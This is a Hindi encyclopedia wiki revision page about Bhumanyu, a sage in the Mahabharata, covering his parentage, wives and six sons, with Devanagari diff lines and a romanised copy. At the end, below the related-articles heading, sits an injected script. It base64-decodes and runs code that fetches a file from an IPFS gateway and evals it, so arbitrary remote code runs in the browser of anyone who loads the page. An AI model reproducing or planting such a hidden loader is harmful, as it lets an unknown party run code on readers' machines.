Difference between revisions of "भुमन्यु"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{बहुविकल्प|बहुविकल्पी शब्द=भुमन्यु|लेख का नाम=भुम...' के साथ नया पृष्ठ बनाया)
 
Line 3: Line 3:
 
'''भुमन्यु''' [[हिन्दू]] मान्यताओं और पौराणिक [[महाकाव्य]] [[महाभारत]] के उल्लेखानुसार एक महर्षि थे, जो [[दुष्यंत|राजा दुष्यंत]] का पौत्र, एवं [[भरत (दुष्यंत पुत्र)|भरत राजा]] का पुत्र था।
 
'''भुमन्यु''' [[हिन्दू]] मान्यताओं और पौराणिक [[महाकाव्य]] [[महाभारत]] के उल्लेखानुसार एक महर्षि थे, जो [[दुष्यंत|राजा दुष्यंत]] का पौत्र, एवं [[भरत (दुष्यंत पुत्र)|भरत राजा]] का पुत्र था।
  
*[[भरद्वाज ऋषि]] के कृपाप्रसाद से यह उत्पन्न हुआ था। इसकी माता का नाम [[सुनंदा]] था, जो काशीनरेश [[सर्पसेन]] की कन्या थी<ref>महाभारत आदिपर्व.90.34</ref>।
+
*[[भरद्वाज|भरद्वाज ऋषि]] के कृपाप्रसाद से यह उत्पन्न हुआ था। इसकी माता का नाम [[सुनंदा]] था, जो काशीनरेश [[सर्पसेन]] की कन्या थी<ref>महाभारत आदिपर्व.90.34</ref>।
 
*इसके पिता भरत ने इसे यौवराज्यभिषेक किया किन्तु आरम्भ से ही विरक्त प्रकृति का होने के कारण, इसने राज्यपद का स्वीकार न किया, एवं भरत के पश्चात इसका पुत्र [[सुहोत्र]] राजगद्दी पर बिठाया गया।
 
*इसके पिता भरत ने इसे यौवराज्यभिषेक किया किन्तु आरम्भ से ही विरक्त प्रकृति का होने के कारण, इसने राज्यपद का स्वीकार न किया, एवं भरत के पश्चात इसका पुत्र [[सुहोत्र]] राजगद्दी पर बिठाया गया।
 
*इसे ऋचीक कन्या पुष्करिणी एवं दशार्ह कन्या विजया नामक दो पत्नियाँ थी।  
 
*इसे ऋचीक कन्या पुष्करिणी एवं दशार्ह कन्या विजया नामक दो पत्नियाँ थी।  

Revision as of 06:04, 7 February 2016

chitr:Disamb2.jpg bhumanyu ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- bhumanyu (bahuvikalpi)

bhumanyu hindoo manyataoan aur pauranik mahakavy mahabharat ke ullekhanusar ek maharshi the, jo raja dushyant ka pautr, evan bharat raja ka putr tha.

  • bharadvaj rrishi ke kripaprasad se yah utpann hua tha. isaki mata ka nam sunanda tha, jo kashinaresh sarpasen ki kanya thi[1].
  • isake pita bharat ne ise yauvarajyabhishek kiya kintu arambh se hi virakt prakriti ka hone ke karan, isane rajyapad ka svikar n kiya, evan bharat ke pashchat isaka putr suhotr rajagaddi par bithaya gaya.
  • ise rrichik kanya pushkarini evan dasharh kanya vijaya namak do patniyaan thi.

pushkarini se nimnalikhit chhah putr utpann hue.

  1. vitath
  2. suhotri
  3. suhotr
  4. suhavi
  5. suyaju
  6. rrichik[2][3]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. mahabharat adiparv.90.34
  2. mahabharat adiparv 89.18-21
  3. bhumanyu (hindi) transliteral foundation. abhigaman tithi: 14 janavari, 2016.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>